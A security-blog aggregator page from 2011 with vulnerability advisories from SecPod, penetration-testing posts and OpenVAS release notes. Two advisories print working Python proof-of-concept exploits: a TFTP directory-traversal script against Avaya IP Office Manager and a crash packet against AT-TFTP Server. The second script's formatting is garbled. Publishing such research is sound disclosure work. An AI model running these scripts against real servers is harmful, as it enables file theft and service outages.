by Veerendra GG at August 04, 2011 01:01 PM

Habari Installation Path Disclosure Vulnerability

SecPod Research Team member (Prabhu S Angadi) has found an Information Disclosure Vulnerability in Habari. Direct HTTP request to certain pages will disclose the full installation path, which can be used for further attacks.


More information on the flaws can be found here.

by Veerendra GG at August 04, 2011 12:44 PM

July 31, 2011

Nth Dimension/:: Negatively discriminating against idiots since 1995!

Breaking cpau, a dummies guide

So recently I had a penetration test where the client had a requirement to allow normal users to execute a specific command as a local admin. Normally, when I hear such a requirement my eyes light up as it can often be a quick way to get SYSTEM and then the domain. However in this instance, the client proudly told me about his underhanded method. Rather than use something like psexec, he'd discovered a nifty little utility called cpau which purported to encode the credentials to make it safe for use by normal users. Red rag to a bull, I decided to take a look, perhaps the encoding was weak and I could retrieve those all important credentials....

by timb@machine.org.uk (Tim Brown) at July 31, 2011 09:33 PM

July 08, 2011

SecPod Research Blog

Avaya IP Office Manager TFTP Server Directory Traversal Vulnerability

SecPod Research Team member (Veerendra G.G) has found a Directory Traversal Vulnerability in Avaya IP Office Manager TFTP Server. The vulnerability is caused due to improper validation of TFTP READ requests containing ‘../’ sequences, which allows attackers to read arbitrary files via directory traversal attacks and gain sensitive information.

POC : Download here.

Packet Capture : Download here.

More information can be found here.

#!/usr/bin/python
##############################################################################
# Exploit   : http://secpod.org/blog/?p=225
#             http://secpod.org/Exploit-Avaya-IP-Manager-Dir-Trav.py
#             http://secpod.org/advisories/SecPod_Avaya_IP_Manager_TFTP_Dir_Trav.txt
# Author    : Veerendra G.G from SecPod Technologies (www.secpod.com)
#
# Get File content using Directory Traversal Attack
# Tested against Avaya Office IP Manager 8.1
##############################################################################

def sendPacket(HOST, PORT, data):
    '''
    Sends UDP Data to a Particular Host on a Specified Port
    with a Given Data and Return the Response
    '''
    udp_sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    udp_sock.sendto(data, (HOST, PORT))
    data = udp_sock.recv(1024)
    udp_sock.close()
    return data

if __name__ == "__main__":

    if len(sys.argv) < 2:
        print "\tUsage: python exploit.py target_ip"
        print "\tExample : python exploit.py 127.0.0.1"
        print "\tExiting..."
        sys.exit(0)

    HOST = sys.argv[1]       			## The Server IP
    PORT = 69                			## Default TFTP port

    data = "\x00\x01"        			## TFTP Read Request
    data += "../" * 10 + "boot.ini" + "\x00"	## Read boot.ini file using directory traversal
    data += "octet\x00"				## TFTP Type

    rec_data = sendPacket(HOST, PORT, data)
    print "Data Found on the target : %s " %(HOST)
    print rec_data.strip()

Welcome any feedback or suggestion.

Cheers!
SecPod Research Team

by Veerendra GG at July 08, 2011 07:22 AM

Andy’s PHP Knowledgebase Multiple Cross-Site Scripting Vulnerabilities

SecPod Research Team member (Sooraj K.S) has found multiple cross-site scripting vulnerability in Andy’s PHP Knowledgebase. The vulnerability is caused by improper validation of various parameters in several pages. This may allow an attacker to steal cookie-based authentication credentials or inject arbitrary HTML code and launch further attacks.

More information can be found here.

by Veerendra GG at July 08, 2011 07:03 AM

appRain Quick Start Edition Core Edition Multiple Persistence Cross-Site Scripting Vulnerabilities.

SecPod Research Team member (Antu Sanadi) has found multiple persistence cross-site scripting vulnerability in appRain Quick Start Edition Core Edition. The vulnerability is caused by improper validation of various parameters. This may allow an attacker to steal cookie-based authentications or inject arbitrary HTML code and launch further attacks.

More information can be found here.

by Veerendra GG at July 08, 2011 06:47 AM

S40 Content Management System (CMS) v0.4.2 beta Cross-Site Scripting Vulnerability

SecPod Research Team member (Antu Sanadi) has found a cross-site scripting vulnerability in S40 Content Management System (CMS). Input passed via the ‘gsearchfield’ parameter in ‘index.php’ is not properly verified before it is returned to the user. This may allow an attacker to steal cookie-based authentication credentials or inject arbitrary HTML code.

More information can be found here.

by Veerendra GG at July 08, 2011 06:29 AM

July 06, 2011

OpenVAS

OpenVAS DevCon #3 : Starting tomorrow

Already for the third time the OpenVAS team meets in real life to discuss and plan next features of the OpenVAS framework. OpenVAS devcon #3 takes place in Osnabruck in Germany from 7th to 9th of July, 2011. Greenbone Networks GmbH kindly hosts the developer conference at their offices:
Neuer Graben 17
49074 Osnabrück
Germany

Anyone being active as OpenVAS developer, tester, packager or user is welcome. Check out official devcon page. You can also still submit lightning talks, more info here.

by noreply@blogger.com (kost) at July 06, 2011 12:47 PM

April 25, 2011

SecPod Research Blog

AT-TFTP Server v1.8 Remote Denial of Service Vulnerability

SecPod Research Team member (Antu Sanadi) has found a Denial of Service vulnerability in Allied Telesyn TFTP Server. The vulnerability is caused by an error in the “TFTPD.EXE”, which causes the server to crash when no acknowledgment response is sent back to the server after a successful ‘read’. The flaw can be exploited to crash a vulnerable server denying service to legitimate users.

POC : Download here

More information can be found here.

#!/usr/bin/python

##############################################################################
# Exploit   : http://secpod.org/SecPod_AT_TFTP_DoS-POC.py
# Reference : http://secpod.org/blog/?p=194
#           : http://secpod.org/advisories/SecPod_AT_TFTP_DoS.txt
# Author    : Antu Sanadi from SecPod Technologies (www.secpod.com)
#
# Exploit will crash AT-TFTP Server v1.8 Service
# Tested against AT-TFTP Server v1.8 server
##############################################################################

import socket
import sys

host = '127.0.0.1'
port = 69

try:
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
except:
print &amp;amp;amp;amp;amp;amp;amp;amp;quot;socket() failed&amp;amp;amp;amp;amp;amp;amp;amp;quot;
sys.exit(1)

addr = (host,port)

data ='\x00\x01\x2e\x2e\x2f\x2e\x2e\x2f\x2e\x2e\x2f\x62\x6f\x6f' +\
'\x74\x2e\x69\x6e\x69\x00\x6e\x65\x74\x61\x73\x63\x69\x69\x00'
s.sendto(data, (host, port))

Welcome any feedback or suggestion.

Cheers!
SecPod Research Team

by Veerendra GG at April 25, 2011 08:17 AM

March 31, 2011

SecPod Research Blog

AR Web Content Manager (AWCM) Cross-Site scripting Vulnerability

SecPod Research Team member (Antu Sanadi) has found an XSS flaw in AR Web Content Manager (AWCM), which can be used to obtain sensitive information and launch further attacks. The flaw lies in the ’search’ parameter in ‘search.php‘ while the application processes the user-supplied input and renders the content back to the client’s browser. The flaw can be exploited to inject arbitrary HTML code and steal cookies and so on.

Solution can be found at, here

More information can be found here.

by Veerendra GG at March 31, 2011 12:02 PM

February 15, 2011

Nth Dimension/:: Negatively discriminating against idiots since 1995!

Bypassing the Android pattern lock

At the back end of last year I got a Sony Erricson X10 only to discover that it was still running Android 1.6. This didn't bother me too much at the time as it had all the features I was after (web, SMS and voice) and I left it as it was. Recently however I've been getting into Android security, inspired first by Nils talk at CRESTCon and more recently by some for a client. Anyway, throughout this time, I became aware of an issue that affects the X10. It seems that it is possible to bypass the pattern lock and gain access to data on a locked device. So how is this possible? Take a look at the following:...

by timb@machine.org.uk (Tim Brown) at February 15, 2011 11:09 PM

February 12, 2011

Nth Dimension/:: Negatively discriminating against idiots since 1995!

Introducing VulnApp

Recently myself and a colleague were asked to give some training to some ASP.net developers. My colleague was asked to give the main training session whilst I was asked to run a post training game to test the developers retention of the concepts. After looking at some of the existing ASP.net applications I decided I'd like to write my own. The result of this is VulnApp, a BSD licensed ASP.net application implementing some of the most common applications we come across on our penetration testing engagements. Whilst I'm not intending to package this up into a standalone install, today I committed the source to my CVS server so that others can, if they like, make use of it....

by timb@machine.org.uk (Tim Brown) at February 12, 2011 08:22 PM

January 17, 2011

OpenVAS

OpenVAS Administrator 1.0.1 released

The OpenVAS developers are happy to announce the first maintenance release for the 1.0 series of the Administrator module for the Open Vulnerability Assessment System (OpenVAS).

It improves LDAP-based authentication and adds self-documentation feature for the OpenVAS Administration Protocol (OAP) 1.0.

Many thanks to everyone who has contributed to this release: Matthew Mundell, Michael Wiegand, Jan-Oliver Wagner and Felix Wolfsteller.

Main changes since 1.0.0:
* Fixed behaviour for ldap-based authentication for Admin role.
* Added protocol documentation for OAP (html and rnc format,
can be build with "make doc").
* Code hardening at compile time is now the default.
* Harmonized output of "--version" with other modules.

The source tarball for this release is available for download from the OpenVAS website at http://www.openvas.org/. Binary packages for major GNU/Linux distributions by third parties are expected in the following weeks.

by noreply@blogger.com (kost) at January 17, 2011 11:53 PM